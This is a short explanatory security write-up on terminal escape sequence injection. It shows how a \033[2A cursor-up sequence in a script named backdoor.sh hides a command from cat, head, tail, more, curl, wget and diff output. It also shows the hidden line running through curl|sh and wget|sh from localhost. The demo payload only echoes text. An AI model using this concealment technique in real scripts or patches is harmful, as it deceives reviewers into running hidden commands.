How it technically works
- A terminal escape sequence is a special sequence of characters that is printed (like any other text).
- If the terminal understands the sequence, it won’t display the character-sequence, but will perform some action.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!- As you can see, our beloved ‘cat’ cheated on us.
- Instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action.
- And this action moves the cursor up X times, overwriting what is above it X lines.
- But this doesn’t affect only
cat, it affects everything that interprets escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!- But if we pipe it into a shell
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!diffalso interprets escape sequences and so do the resulting patches
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!Reference
http://www.openwall.com/lists/oss-security/2015/09/17/5 http://www.openwall.com/lists/oss-security/2015/08/11/8 http://turbochaos.blogspot.ca/2014/08/journalctl-terminal-escape-injection.html